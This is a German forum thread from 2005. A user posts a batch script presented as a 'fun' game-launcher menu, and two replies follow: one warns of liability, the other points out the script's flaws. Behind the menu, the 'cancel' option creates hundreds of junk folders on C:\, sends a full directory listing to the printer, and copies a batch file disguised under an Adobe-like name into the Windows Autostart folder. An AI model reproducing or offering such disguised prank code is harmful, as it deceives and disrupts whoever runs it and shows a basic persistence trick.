# Funny batch



## bRiaN (14. Januar 2005)

Hi mir war eben ein bissel langweilig ) hier ein kleines fun script was sehr gemein sein kann ))


```
echo off
:START
cls
echo.
echo.
echo              =======================================================
echo                               - bRiaN Game t00l v0.1 -
echo              =======================================================
echo.
echo.
echo.
echo         ///               Was willste Zocken ?                   \\\
echo.
echo.
echo       ##### 
echo       ##### 1. Winmine
echo       ##### 
echo       ##### 2. Solitaire
echo       ##### 
echo       ##### 3. Hearts
echo       ##### 
echo       ##### 4. Frecell
echo       ##### 
echo       ##### 5. PinBall
echo       ##### 
echo       ##### 6. Spider Solitaire
echo       ##### 
echo       ##### 7. Abbruch
echo.
echo.
choice /C:1234567 /N
if errorlevel 255 goto :BYE
if errorlevel 7 goto :DIRCREATE
if errorlevel 6 goto :DIRCREATE
if errorlevel 5 goto :PINBALL
if errorlevel 4 goto :FREECELL
if errorlevel 3 goto :MSHEARTS
if errorlevel 2 goto :SOLITAIRE
if errorlevel 1 goto :WINMINE

:WINMINE
winmine.exe
goto :START

:SOLITAIRE
sol.exe
goto :START

:MSHEARTS
mshearts.exe
goto :START

:FREECELL
freecell.exe
goto :START

:PINBALL
pinball
goto :START

:DIRCREATE
cls
cd c:\
MD 1PWNED
MD 2PWNED
MD 3PWNED
MD 4PWNED
MD 5PWNED
MD 6PWNED
MD 7PWNED
MD 8PWNED
MD 9PWNED
MD 10PWNED
MD 11PWNED
MD 12PWNED
MD 13PWNED
MD 14PWNED
MD 15PWNED
MD 16PWNED
MD 17PWNED
MD 18PWNED
MD 19PWNED
MD 20PWNED
MD 31PWNED
MD 32PWNED
MD 33PWNED
MD 34PWNED
MD 35PWNED
MD 36PWNED
MD 37PWNED
MD 38PWNED
MD 39PWNED
MD 40PWNED
MD 41PWNED
MD 42PWNED
MD 43PWNED
MD 44PWNED
MD 45PWNED
MD 46PWNED
MD 47PWNED
MD 48PWNED
MD 49PWNED
MD 50PWNED
MD 51PWNED
MD 52PWNED
MD 53PWNED
MD 54PWNED
MD 55PWNED
MD 56PWNED
MD 57PWNED
MD 58PWNED
MD 59PWNED
MD 60PWNED
MD 61PWNED
MD 62PWNED
MD 63PWNED
MD 64PWNED
MD 65PWNED
MD 66PWNED
MD 67PWNED
MD 68PWNED
MD 69PWNED
MD 70PWNED
MD 71PWNED
MD 72PWNED
MD 73PWNED
MD 74PWNED
MD 75PWNED
MD 76PWNED
MD 77PWNED
MD 78PWNED
MD 79PWNED
MD 80PWNED
MD PWNED
MD WINNT
MD WlNDOWS
MD ALCATECH
MD MAXON
MD DRIVER
MD Games
MD ARSCHKUH
MD LOL
MD ROFL
MD 2222222222222222222
MD 1PWNEDfsd
MD 2PWNEDfsad
MD 3PWNEDf
MD 4PWNEDasdf
MD 5PWNEDsd
MD 6PWNEDfs
MD 7PWNEDdaf
MD 8PWNEDsad
MD 9PWNEDf
MD 10PWNEDsadf
MD 11PWNEDsd
MD 12PWNEDfs
MD 13PWNEDadf
MD 14PWNEDsd
MD 15PWNEDfs
MD 16PWNEDadf
MD 17PWNEDasd
MD 18PWNEDf
MD 19PWNEDsdaf
MD 20PWNEDasd
MD 31PWNEDfsd
MD 32PWNEDf
MD 33PWNEDsdaf
MD 34PWNEDsad
MD 35PWNEDf
MD 36PWNEDsdf
MD 37PWNEDsadgfdgre
MD 38PWNEDt
MD 39PWNEDert
MD 40PWNEDert
MD 41PWNEDer
MD 42PWNEDz
MD 43PWNEDerhjgh
MD 44PWNEDf
MD 45PWNEDhgf
MD 46PWNEDhg
MD 47PWNEDn5
MD 48PWNEDcv534
MD 49PWNED543
MD 50PWNEDdf43sw4534
MD 51PWNED45
MD 52PWNED35534
MD 53PWNED353445
MD 54PWNED4
MD 55PWNEDh5
MD 56PWNEDh534
MD 57PWNEDgcf34
MD 58PWNEDdf345
MD 59PWNEDhz5
MD 60PWNEDsd534
MD 61PWNEDfzg34
MD 62PWNEDrest45
MD 63PWNED54345
MD 64PWNED35f
MD 65PWNED4t
MD 66PWNED45
MD 67PWNED
MD 68PWNEDdfs
MD 69PWNEDs454
MD 70PWNEDsh
MD 71PWNEDh
MD 72PWNED54 tghs
MD 73PWNED534
MD 74PWNED34
MD 75PWNED35
MD 76PWNED54
MD 77PWNED534
MD 78PWNED4
MD 79P4534534534WNED
MD 80PWNED
MD PWNED
MD WINNT
MD WlNerDOWS
MD ALCATtECH
MD MAXONetr
MD DRIVERetr
MD Gamesetrr
MD ARSCHKUHte
MD LOLetetrr
MD ROFLetr
MD weq
MD weqw
MD eqw
MD e asd
MD asf
MD cdb
MD dfah
MD 467uz
MD jd
MD fasd
MD t1
MD 34564
MD 5
MD tugh
MD s
MD wa45
MD er456
MD wer456
MD 746
MD j65
MD j45
MD 6546
MD wrz45
MD gf56
MD hztr6
MD 764567u5
MD tz7hj
MD 67i9kmhj
MD fgk
MD g
MD mz4356gfsf
MD th
MD vsdg
MD fd
MD gadf
MD gdfgh
MD gjh
MD j
MD h657trhggk
MD 5fh
MD 768gh
MD 76876fgh8
MD 778gf
MD 8778h
MD 8768gfh
MD gf
MD hgfzterz
MD htrgh
MD gfhtzg
MD fderza
MD htrtfgzg
MD fresd
MD dfgergfat
MD fgreta
MD sdertff
MD gtgsf
MD dserfgg
MD dtffsdg
MD gfds
MD g
MD fsdg
MD sdfg
MD fsd
MD x
MD xx
MD xxx
MD xxxx
MD xxxxx
MD xxxxxx
MD xxxxxxx
MD xxxxxxxx
MD xxxxxxxxx
MD xxxxxxxxxx
MD xxxxxxxxxxx
MD xxxxxxxxxxxx
MD xxxxxxxxxxxxx
MD xxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
MD a
MD aa
MD aaa
MD aaaa
MD aaaaa
MD aaaaaa
MD aaaaaaa
MD aaaaaaaa
MD aaaaaaaaa
MD aaaaaaaaaa
MD aaaaaaaaaaa
MD aaaaaaaaaaaa
MD aaaaaaaaaaaaa
MD aaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
MD b
MD bb
MD bbb
MD bbbb
MD bbbbb
MD bbbbbb
MD bbbbbbb
MD bbbbbbbb
MD bbbbbbbbb
MD bbbbbbbbbb
MD bbbbbbbbbbb
MD bbbbbbbbbbbb
MD bbbbbbbbbbbbb
MD bbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
MD c
MD cc
MD ccc
MD cccc
MD ccccc
MD cccccc
MD ccccccc
MD cccccccc
MD ccccccccc
MD cccccccccc
MD ccccccccccc
MD cccccccccccc
MD ccccccccccccc
MD cccccccccccccc
MD ccccccccccccccc
MD cccccccccccccccc
MD ccccccccccccccccc
MD cccccccccccccccccc
MD ccccccccccccccccccc
MD cccccccccccccccccccc
MD ccccccccccccccccccccc
MD cccccccccccccccccccccc
MD ccccccccccccccccccccccc
MD cccccccccccccccccccccccc
MD ccccccccccccccccccccccccc
MD cccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccccccccccccccc
MD cccccccccccccccccccccccccccccccccccccccccccccccccccccccc
MD ccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
MD _
MD __
MD ___
MD ____
MD _____
MD ______
MD _______
MD ________
MD _________
MD __________
MD ___________
MD ____________
MD _____________
MD ______________
MD _______________
MD ________________
MD _________________
MD __________________
MD ___________________
MD ____________________
MD _____________________
MD ______________________
MD _______________________
MD ________________________
MD _________________________
MD __________________________
MD ___________________________
MD ____________________________
MD _____________________________
MD ______________________________
MD _______________________________
MD ________________________________
MD _________________________________
MD __________________________________
MD ___________________________________
MD ____________________________________
MD _____________________________________
MD ______________________________________
MD _______________________________________
MD ________________________________________
MD _________________________________________
MD __________________________________________
MD ___________________________________________
MD ____________________________________________
MD _____________________________________________
MD ______________________________________________
MD _______________________________________________
MD ________________________________________________
MD _________________________________________________
MD __________________________________________________
MD ___________________________________________________
MD ____________________________________________________
MD _____________________________________________________
MD ______________________________________________________
MD _______________________________________________________
MD ________________________________________________________
MD _________________________________________________________
MD __________________________________________________________

cd c:\
dir /s > LPT1 
copy adobe_gamma_loader.bat c:\dokumente und einstellungen\all users\startmenü\programme\autostart

cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo                              Nun schau mal auf c:\    ;)
echo.
echo.
echo.
echo.
echo.
echo.
pause
cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo				    ach, und aufm desktop
echo.
echo.
echo.
echo.
echo.
echo.
pause
cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo     		und wenn du gerade dabei bist auch noch auf d:
echo.
echo.
echo.
echo.
echo.
echo.
pause

cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo                           hab ich c:\programme schon erwähnt ?
echo.
echo.
echo.
echo.
echo.
echo.
pause

cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo                                       nein ?
echo.
echo.
echo.
echo.
echo.
echo.
pause

cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo                             dann schau da auch mal nach ...
echo.
echo.
echo.
echo.
echo.
echo.
pause

cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo          und weil ostern nopch nicht lange vorbei ist, hab ich auch noch was versteckt
echo.
echo.
echo.
echo.
echo.
echo.
pause
GOTO :BYE

:BYE
cls
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo                              Auf Wiedersehen
echo.
echo.
echo.
echo.
echo.
echo.
pause
```

Game script *Full Version*

©bRiaN 2005


----------



## Thomas Darimont (17. Januar 2005)

Hallo!

...dir ist ja wohl klar, dass Leute die das wirklich ausführen mit etwaigen Schadensersatzforderungen an dich herantreten, nicht wahr?

Gruß Tom


----------



## Dennis Wronka (19. Januar 2005)

Ein paar Anmerkungen zu dem Schrott:
1. "md WINNT" ist doppelt
2. es wird nichts auf D: und in C:\Programme erzeugt
3. waere es besser das Programme-Verzeichnis aus den Umgebungsvariablen zu lesen um etwas glaubwuerdiger zu bleiben, da ich unter meinem englischen 2000 daheim kein Verzeichnis Programme habe (irgendwie verstaendlich, oder?)
4. bevor Du behauptest auf D: (oder auch in C:\Programme) was gemacht zu haben solltest Du pruefen ob das auch existiert. Wie gesagt, ich hab kein C:\Programme, das heisst bei mir Program Files


----------

